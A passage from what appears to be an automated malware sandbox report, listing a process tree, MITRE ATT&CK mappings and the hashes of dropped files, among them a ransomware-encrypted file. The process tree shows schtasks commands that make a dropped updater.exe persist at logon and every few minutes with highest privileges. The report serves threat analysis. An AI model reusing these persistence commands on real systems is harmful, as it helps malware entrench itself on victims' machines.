C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 14180 -ip 14180
1⤵
PID:41248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 37980 -ip 37980
1⤵
PID:30184

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:25412

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\1e91e576d4f849d588617f26965ac41b /t 14872 /p 13328
1⤵
PID:63368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 21880 -ip 21880
1⤵
PID:25816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:62852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 14180 -ip 14180
1⤵
PID:47096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:22736

C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
1⤵
PID:27772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:28360

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:27276

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
1⤵
PID:26612

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
1⤵
PID:27716

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:32092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 44672 -ip 44672
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 52888 -ip 52888
1⤵
PID:36504

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc WATCHDOG WATCHDOG-20250120-1840.dmp
1⤵
PID:43496

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
1⤵
PID:50660

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:50768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 52888 -ip 52888
1⤵
PID:48772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

Filesize
3.6MB

MD5
d25c3bd6c96b1d4b95f492a9daa4a6a1

SHA1
9b4f388fec4511ce3fa5bf855626c7c7b517ac21

SHA256
fa0f2e683c50d4908381e6ef16edcec29cc3f1d225b63de58f83d1c9bd854ff9

SHA512
75d26dc48a6446e3bf47c45edd3697d52332106a400f34b4ca7af588e226f5f5563a13156568582b6e5a97edd8f1cf60d1ede7dcb9d5aca9f41eec628a7e041a

Download Submit
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe

Filesize
181KB

MD5
4b0bf7525348fd3b55b189c42f90633c

SHA1
3861f8dad235032ff0d68065fde4082b379f02b2

SHA256
f318deb222e9f635f3a7b7de3202169732ebdb4ccf0be5fa8bb94e2e83913b74

SHA512
ae87acaf33c4cc1a1368b427128432b94a8030f8837490ecaf6a394a5e2e5a9340e243f436b894fa269a8bec3d22da93b9e480d33911938e995055c3e7a8cb76

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
158KB

MD5
bfb045ceef93ef6ab1cef922a95a630e

SHA1
4a89fc0aa79757f4986b83f15b8780285db86fb6

SHA256
1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d

SHA512
9c1bfa88b5b5533ede94158fa3169b9e0458f1ceae04dae0e74f4c23a899ce27d9109bd298a2053fb698e2ed403f51a9b828ee9fa9d66b54a18cd0d969edc194

Download Submit
C:\Program Files (x86)\Maza\maza-qt.exe

Filesize
33.1MB

MD5
6afec4153f3d4be841d67181888a3cf5

SHA1
6138bf3eec5e681dedd74976db456f30f41cff85

SHA256
9a6847373252707769f933be71f21abc94279f8ad6ac00f1125166067e4c0591

SHA512
f763581413173d2eb45af174943bdd7e78400894faa4ccaf8d4273f8388cd31bf7a21ac7b669b9f591a5a9116cd115ab123051737ccae600dbf17c478bc54baa

Download Submit
C:\Program Files (x86)\R-Studio\r-studio.exe

Filesize
155KB

MD5
e3804fe6b4353c7ca0e8257ce0c74bc8

SHA1
7ec90203a718109df9ab9bdc9b497493acf60e9d

SHA256
132c7cc32d7de3844155353605d895da925eedb7c1f324a6ad28051dd2d1a03d

SHA512
ea4485a57a0bb0b5ac300930dbd03d44187fc270b73859f5f7bcde83a693b57d6a1157f6deb119546aed0c05a66d0a30b0de35339b576dee5d20da63fa05c298

Download Submit
C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe

Filesize
11.3MB

MD5
89d9527f0a0dee03a03b82ee9e5970ac

SHA1
8954423f287c61b6762e3c7646c25035cd0ac3d2

SHA256
c51289c49ea88eae719f69ebe2d85f30993d8c7af297e1f47149e96b431a046e

SHA512
42f95eced4f002e2e5f10fd8507f706277a7d9f057bdcb6c867db18bbba0ca28f035a55373c5a483d22bbec6f3371b21566fc92f2d8419be0d3dbf9ff264161f

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe.id-0689F182.[[email protected]].ncov

Filesize
2.9MB

MD5
cb4966e44119ee8accb734b034e85e39

SHA1
6aff2e83284ca23ab2f307df378af745dde3221f

SHA256
ce03434d7832c34359c6d38c6aec0227a3040dae8f6989415b4c20d9a0351ac3

SHA512
aaf95c85457b1f077d81e99c18afec0ef73d41262220ee6a755bf03845c189865d2dd0a49c03728c71f65c75e3084a157a6881c8b3da98deb70560d6c9655048

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
2KB

MD5
8e3c698a09f567a9beda8388e7d8d92a

SHA1
7a581b2e0ee704223e40076d8de4265c76706eec

SHA256
7675575531533c89373b77ad4d882a6902f6e9f454a27b21cc080673aa9f0c52

SHA512
ce8c51b2df28a0b181fc4d3fe344659523953d9edd27fffa2cbd63619e7093d217e401fb41fdfc4c969cb0c034d6651aa04d0579fd6207316c0645b8d3cddc72

Download Submit
C:\ProgramData\AnyDesk\service.conf

Filesize
1KB

MD5
fe8ec6c14089ab3b9abbd379f18723ed

SHA1
5ca12a79fdcc4b8a06069f8dd73e4891e2a84690

SHA256
0879eab02d7ed695ccc6f5e5308dfe3a08a86f9274d2556a8bc327a0e95ed55b

SHA512
8b12552eeef3d898585f07c84420851a53678d60d7c8925517bbfb488e8a93aef14d5c5403a414b5f89bbf05ee610d19ad1ef2f97a2c2cb6deb2eb28355fa22c

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
459B

MD5
47226dc4d9d1188a80c053c016a8a00e

SHA1
7bee03316d94427d3d80184439588e7b6db18c1c

SHA256
b41fa96af295717be9dc47ab1e1d884ddacc9e9771aa482824a6dd4bc36196d2

SHA512
ad4971eb41675145403c332246d792216f714c5880f0fbc41ce6f211f000bb535b7ae144d187c693c2a5077519b625abbfd0b9285993176bc661e60c09fd5464

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
506B

MD5
672e78a488b182131d17fe9744fe4fa2

SHA1
27589a4adca0151509a81f9c80b23a21a862660f

SHA256
762b77e32cfbec2428c9fe21cf501fc9ea42264f6fcd2d4cdb386e01fab4458f

SHA512
ddbf2970443ee177c3a7d83d42ba3598916844cc26586a3759cc2631415da745884776f564d04f67e22007718cac6645e0f10d719bf82cd2b8cd2ef045c0f44d

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
102B

MD5
97d9059805b59a38cef6036e01ac9056

SHA1
40429fc8a0d83c6f06f35597e86cc27ef34e1603

SHA256
4cef3a4802bc4cdbde24e0870022c2914608d7bdcc268cf0e1b7d99ec3a0ddbc

SHA512
eaf8b96acc2e66ba07c5881de8d2f1d853f9191c494dc436425a297390fd5239fd48ce1dd7cfde0393237dc1811f52822405b5f397cfc15a98f763c04d233041

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
319B

MD5
0c42a6fcb801645c45a6ccf954be75ba

SHA1
93b46bb7115af210d9925b8256d03015af7555ff

SHA256
00bd6ee1957a4ccad3587751c2018c2c1c9c87faae444910a1df867bbf7de709

SHA512
f6f6ea918bd4854e004336f9bf5894b648cd2fabc8664d70ff108cb4818c2885f032d5d2cd54555bf46a7a19bb2600a3d563923b3c55509e18ac802e7803aeca

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
345B

MD5
609fcba91f22e0a12e9cc9b1d1fb88a4

SHA1
dedc8ba2c71fac7cb3a081f76fa3e6d6c14c0b16

SHA256
d1215c78fedb67e6fc73e9da59a6a9a285f4b2d28bf57d4fff4c31afe73f0511

SHA512
c0ad86d6528e1e3d8c958d6c44ec24f48f18b78a43286a6cfe5628bdf9813b310223e14222ab44980eafdd07d94c7f819bdd46bbb6850df8c13737c1afe120a1

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
368B

MD5
5d959a5a4e299be8a95f56f3a8082baf

SHA1
3c8b979dc037da1fbe0ae40b60608bf1bacc5488

SHA256
5648c2affee1394441460193c9167269ddd9ff3123484cae59b69e4795856304

SHA512
224bdd760650d815154da83aaa1fbee92e22f3b1be6f36a2e445b8778bbe1bff7cf07ca118a431f372ab518359ccbdbccfd5fa169559fe03623ba254cf5e176e

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
402B

MD5
08caafbdefae396980d220608f8c774c

SHA1
a604d029804631952ea2d31af02d1a230a6bc069

SHA256
5e766d9c53362fca944066bbb24f0e34752ffa75c3d29eba449eef4e0e42c951

SHA512
2b79491c3472eaf6547a8d7de690290f573df6d70a4881f5769ae8726c3d014087398be9f2e5a26b6ad40d5f8b38fe6a9dbbf46176f6fb622d29cd0a9c6bac62

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
34B

MD5
4f559d9257cbacf85aaeb62f530c70cd

SHA1
23c369aeb9a8f6e8c036291a159bfa94b7595f91

SHA256
863f86c0cd7c7451faa39ac7d9de56522eae32ba652d1d31d48743295eead598

SHA512
5d92dab2df65e54a3ba445682479f01bd1e620fdcd99b4420ef9fcd0382363004ab439a481e0d6ba79b6831fe899956a611738305fa04fdf18111bae6efe1389

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
181B

MD5
23e1cc56ca048d17d01d3cc2ff6d321a

SHA1
91c528afcfa2afa2dbaecce72186a03a56a96f72

SHA256
e1712af3069d2045377f4e91457cd54e01bcc8dabf23f72ce5ca34207575c54e

SHA512
50d5de994a08d3ba7ae21014fdfc6c99a9642e674f5ebb1ac94d08b5640adedddde170fd8dc238e5444f5ec2a9fbc8ee33966f3e20f50e88394e817994ef6cb8

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
214B

MD5
5952abadd8590317dc5097145372b71f

SHA1
667a411fbee5212d0a59f652ad294b68df2df3c9

SHA256
5c2f6015ad5add4891477b1cabf6f8b7b617269413cf3f8e8a9b0a21a8800979

SHA512
7d81ef67b4d200f0aacf31eab754916886da621eba79bad5afddbaea16eb485f2087aa0158abb13905b164ade6f5110a58a063e218f5ca9ec46419690b9dbea7

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
214B

MD5
6cbdaebe2813fc26e3ff995c2f7be314

SHA1
11d9be7d3cedb9b193d3e311412c053fdbd2e4b5

SHA256
51545873e6cadd41782524ce010e1d836fb9d5be202e380a30ad7145e672d40c

SHA512
5cf5e2972f2aae8689bf5c38c5edafba1fb6be8a6f9753fecac4dcc3210c0d57f6f89e591b6f73804fcb67c74c82ec6b8b830aaadaa26b0e16e8fba935a0cc41

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
302B

MD5
0a08734874edf565b0eb02616b2fb333

SHA1
0d2af3b777eb96a368fbb3c92b9fec16602f7002

SHA256
6fa6220b6af57363464ccf602aa7250e77a5a0a297b8843eecc144e9fea10d84

SHA512
cabb6e1a8dcfe4c7c38f2c475831db2c205d0920e29b36b39f1417eb50c3fd3bea269fcdbe36e538465bd5a972ebcb78a106d152ac5f3abe602f349db24e5a9a

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
157B

MD5
9c4477c9673358cde9c65e240edc5fd9

SHA1
8c0b1f60eba98deaaf15cb6f7ceecb90d2e738cb

SHA256
f247a6b4eb41c4cbbcc557af8bb111750054badcaeecf2973226081fb2822028

SHA512
1d5780e3f094c40f05a7de3463fe03b50ba40be8360b2d79f9f1c27c9dd3c2da8388a74619efb2b5f7fdc98471b6f1fde01c038d1518337e6cf8d4d5fd5bafc7

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
214B

MD5
9d00cf1574b91a702285bac8a8c3fe0d

SHA1
9e63f69da29361553a8445935a6e53aa4f31b65b

SHA256
372af36eb2044eb08e1d8eb53c8721336b364551faa2cf74893c39ca066610a0

SHA512
b39adefd1020a5babf4566c8fe131785592643faa30c456c7a201516e9818081ec2a97aa1d86fde20eefef886a071bb40aeef68405de6b07fdb50efeb664e3c7

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
278B

MD5
5ca4ec4f7d1888aff1c7cfb188dc8cce

SHA1
1184f898ee500a11db55eaf9a6e048b84ce4c461

SHA256
bb426e9a8791f9140d0eef5b29c639f263619e0fe7f6d63fd986e280f8d64581

SHA512
e0ef80f60b3afe4dea861fceced6523fdd4f74b4e892358d9e8e463bcd34c7be969ca1c65cc24ada880f0262365de186814e99c7235c14bec94f1062df412a72

Download Submit
C:\ProgramData\AnyDesk\system.conf

Filesize
60B

MD5
25e71767a94343d45dd3e066c05784bf

SHA1
901ae90156458e9b91f29cb0789964a5bfbc1127

SHA256
1b7467f3f2b0a63dc29701aa97c9e7b76757e4aa6c44d61e48e067068ca88525

SHA512
ae538706623ced39a44622e9fd0f0422c4824bf9e8cc2ef6b143458873d142230ad949efeb8651fdba70f9488be935ace6bf40a8da842d74ca7895c85abb4bd6

Download Submit
C:\ProgramData\Synaptics\RCXC739.tmp

Filesize
753KB

MD5
80421089b46d27ad31bba48f8946af3f

SHA1
71f6418b3ad4310c579f0f50beeff472964d349a

SHA256
11f931102f640ea8406d95c2eebeadd1462fd205bc651dac57ac1bcac922e8f5

SHA512
d088ff505dc0d6e1f97e466b7e6459d5b8bfcf3ac7676f60851f2af935009a5b4297598725f799bb8d5900e876879d505a78898a7f6a14babe271b8cd134622e

Download Submit
C:\ProgramData\chrome.dll

Filesize
676KB

MD5
eda18948a989176f4eebb175ce806255

SHA1
ff22a3d5f5fb705137f233c36622c79eab995897

SHA256
81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4

SHA512
160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

Download Submit
C:\Umbrella.flv.exe

Filesize
93KB

MD5
68edafe0a1705d5c7dd1cb14fa1ca8ce

SHA1
7e9d854c90acd7452645506874c4e6f10bfdda31

SHA256
68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d

SHA512
89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\cnct.exe.log

Filesize
319B

MD5
2a0834560ed3770fc33d7a42f8229722

SHA1
c8c85f989e7a216211cf9e4ce90b0cc95354aa53

SHA256
8aa2d836004258f1a1195dc4a96215b685aed0c46a261a2860625d424e9402b6

SHA512
c5b64d84e57eb8cc387b5feedf7719f1f7ae21f6197169f5f73bc86deddb538b9af3c9952c94c4f69ae956e1656d11ab7441c292d2d850a4d2aaa9ec678f8e82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\startup.exe.log

Filesize
408B

MD5
593f806d2255a76afcad5d4a8395781b

SHA1
3990edff12ef61875bb4206b25a97a9440a8998c

SHA256
beb8b3a764b3e94cc547be84090345e833be03d95d680ad4d75734ccd6485757

SHA512
97440ebd7f8aac1030fe83c7f32a40a986d0fa6faec2c8b8cfbce093a3f27e7626c0b6e768ce6c753ac4dddc4227057b3a6e1d5a652d1f4a9cf64fa8efbad017

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
896KB

MD5
8a410ca32cfa68b6af87dd2a15895e22

SHA1
78218033b8278df0e23513baaffdfc346efaf5cb

SHA256
078710f879b2d154a2ca8d9983b4ba9a90fc0be52a52c98658ad9c2c5fa5592c

SHA512
de46b955a9e9ca25d045efae4f34367a5b5832d36e49291d0c5e237381af12045a479b0d53777ab135db15b7af09f24152d48210ba24e4ffe0bc815b9936972e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db

Filesize
1024KB

MD5
feea57c24fa355e419e3e5a3b1a13449

SHA1
b6d0899d45a2bd979907229917e25f6947f8ce2e

SHA256
cd28020cfcfd0852deeb9c26e6f1493a839fae045eccc3eb259b1fb652f9e8f3

SHA512
034ca2c39617062d72515a1f36743045cc271845a80aca631756dd0b7601b32442a83198e32439edfeba7bb05e11754926a12776662d3b92a35ff14697653fe2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
7KB

MD5
4faee21f2aa6a94fd29be1a82531a03c

SHA1
90c0dd6dc71f1acf74bfe8ba7d24ae82873408fa

SHA256
de192cbeffa5e0279849850c752a983d63afeaf6bc1f02ccb0e05ba5248461a4

SHA512
fb15463317d018fe64ff3cdd43d2cc95d3fa0be9d5cb2604ca408cdf14ae33655d0c923d2e4cdd441cee0514fa9104d3685af16d56d4fb2002db8f2ba210d548

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db

Filesize
24B

MD5
419a089e66b9e18ada06c459b000cb4d

SHA1
ed2108a58ba73ac18c3d2bf0d8c1890c2632b05a

SHA256
c48e42e9ab4e25b92c43a7b0416d463b9ff7c69541e4623a39513bc98085f424

SHA512
bbd57bea7159748e1b13b3e459e2c8691a46bdc9323afdb9dbf9d8f09511750d46a1d98c717c7adca07d79edc859e925476dd03231507f37f45775c0a79a593c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
7KB

MD5
ab446de0b4a409b05089d37e9db613d1

SHA1
7e3ea91eb36170b8595655458222628fe7aa9bed

SHA256
131309b85a31857769b0201b2aef1533de9563d119f7e7f022c130573ea333cb

SHA512
7aef650c62aa80d843e17a39417e0e171738f12690a21310ee5fa9f86a188e4b79a118a0861795356909df3ae881158f36f06dc0bbebb48f640af1c12c869466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2G6VS791\76561199804377619[1].htm

Filesize
25KB

MD5
f2492c6a2a5076807641815e4f811f0c

SHA1
91c96a832e83ab5dc72bc3eecc0e3b9a71ee5b18

SHA256
cdb4017ca3391cbd80180e635f2384d372742b3aca7bbbbcd5ba5f6578daa51f

SHA512
3a6664f40f8934b8f932cfe8daeb221cb1c162820c4977b272cc25e93c2de4ba80c2009af8787b313479c9a8debd379684ab3480d59195a18cf5927ad4a45bb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O5QKIIIQ\76561199804377619[1].htm

Filesize
34KB

MD5
8ecd06fdb1539a072f39278bbc346c0d

SHA1
89c9b6fb47468b71a0253dc18ec3eb6b8abcf66a

SHA256
774faaf2642402b8d3a6257277d36c32f2d68c22a9e707f9d94a4edfcf9ecc78

SHA512
bb0e7d66c2150f47dc98e5d2209fef12f8df440fc51aba0e320cbeaad8b0c8a8d2d1b4a00af055eb1b8625247c6f464f0a6f66608a633af5dfbda387d3cf5eaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\2pD5LJ1t.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\48D75E00

Filesize
22KB

MD5
85579b43831609c690fe2810c09e1148

SHA1
f683638b30bdf1119646dcdaf8b2486dd28a9608

SHA256
26f0436626fbd800c20791883ae570d2ce50247c8485d77fb61e89a1ba3025d7

SHA512
ced480242cbcd6dcc2725a063bd25d98bcc75b604712ca1e2b57bdd19b63e42dc7ce41dabbc4763b1438a543919d62f47467192e73fdc11972e55242941da287

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
6.9MB

MD5
b9a0cf1020dcdb5626c3360003456ab0

SHA1
d21946d5f6b448659c65f17eeae504ef1cae32d3

SHA256
396dcfdfa4b2bc2f01f2e0d68f31eb0713b3912ed36f4c3d39fcb3156a62fbfa

SHA512
bc2d9dfe8278fab426f2aca3f5f9a89c1295558365cbe2ef54728d40ff8910e1893aa274d9c85eb1c6f134f7bec27842d61f27b0192ca990946e8c3caa5149a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dominant.cmd

Filesize
12KB

MD5
02ccb333e74fc5c7668a5e11ec5bb982

SHA1
4777e487afa0d81fddfe350d22d9476b217c4a52

SHA256
749f7d74c7e4e2e3177d7eefb8fb53e707283ed96144d101235d9d72cdd40f34

SHA512
540ead28d2e0bc06e82394833d54ca93765a3f2d3b10ddf57af93da002d7a34f533db000865f6d53854205928999031a466ab95c3cff9ed075f05b7c46fe0f74

Download Submit
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

Filesize
3.1MB

MD5
bd4dcbdfdb5fdc1f95bd1168f166153a

SHA1
9db60cf0f8a8b88d3c4601df25963536aaeb1884

SHA256
902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

SHA512
26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
45B

MD5
2c24755535bc6d012785c1ed26c882c6

SHA1
9f2a8fdac77f209185b89d6db596eea1ad301094

SHA256
7f2516e2b0d0c9ce0de6f24fc303701b399e0f4d0da90523128f05d228c20086

SHA512
da3ede2a38ce9e28a4142da416af2d090226152bd9b2257a77abe506bc65881ea6d18fc31fb31a46c71e1abb2d10a5d237919d43011a87d281d8e4a1678e7431

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
203B

MD5
2188095c8662e7e155cd57cbea681dc1

SHA1
10e2fd63429c206f6a544422b78eeabecfac2a65

SHA256
fd0fd0cb692e230bdc6598916ad48e5026052abd37a8598b0df550ed9b930377

SHA512
d33dc0f4d8a4097863c4de6a9ba8a8aa79af83f621f723083606998fcf1adce0099025d831bff0fc8190ab07e87cab0dcb19cbdfc7c2ee1b7cba76e933797f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

Filesize
742KB

MD5
544cd51a596619b78e9b54b70088307d

SHA1
4769ddd2dbc1dc44b758964ed0bd231b85880b65

SHA256
dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

SHA512
f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

Download Submit
C:\Users\Admin\AppData\Local\Temp\RCXB64C.tmp

Filesize
798KB

MD5
0154e51c72e84f5f8e9c1417fd4ad03b

SHA1
0f10ed66d73286491d8a6f6a3a9123e2d93ceb03

SHA256
27985c5a86c1387b65780de33f511bc135e88f345683d58099a7ca26972d174c

SHA512
3b2f20c61d07039bfabf0a1aa90a32b844b285681bc9483154a032b59ff090bbe4e267f143c9258a6a210b3a9c5aadea1adda1d12973c703ff215f99b952f639

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\black.exe

Filesize
538KB

MD5
09929b04b0c29e2722009f49faf7183c

SHA1
8fbaccd01e2f6e3213140402766b90e0409c92be

SHA256
2aa22d6cd757c6e46d10fd8db264481c299ff4646f2698c7a1976384d7c20ee2

SHA512
cc9728af886b748119ae2bede4b7e9ff5f2245eea3d1b9034e943d33a060d78e0191b8df1b80e5e01f666b0de6473c5d846cb446d7f83925bd83fba5be9d091b

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe

Filesize
31KB

MD5
eb6401a1d957dce189e9a1ad06f41172

SHA1
ed58fef2021887c89e2c183d648325e5103eb2dd

SHA256
040473f2b73f8947306d2fa9d99c441447026a56ddcdce11720c17be62e000a8

SHA512
9417fb14d0a8eee31fa6d38df314b9842b01365b0e04885f770da02552125e006cdea6de2ae779db616c0247c41406b8c4c00fca8eb6b646c816e50c35230af6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI415962\importlib_metadata-8.3.0.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI415962\tzdata\zoneinfo\Africa\Conakry

Filesize
130B

MD5
796a57137d718e4fa3db8ef611f18e61

SHA1
23f0868c618aee82234605f5a0002356042e9349

SHA256
f3e7fcaa0e9840ff4169d3567d8fb5926644848f4963d7acf92320843c5d486e

SHA512
64a8de7d9e2e612a6e9438f2de598b11fecc5252052d92278c96dd6019abe7465e11c995e009dfbc76362080217e9df9091114bdbd1431828842348390cb997b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI415962\tzdata\zoneinfo\Africa\Djibouti

Filesize
191B

MD5
fe54394a3dcf951bad3c293980109dd2

SHA1
4650b524081009959e8487ed97c07a331c13fd2d

SHA256
0783854f52c33ada6b6d2a5d867662f0ae8e15238d2fce7b9ada4f4d319eb466

SHA512
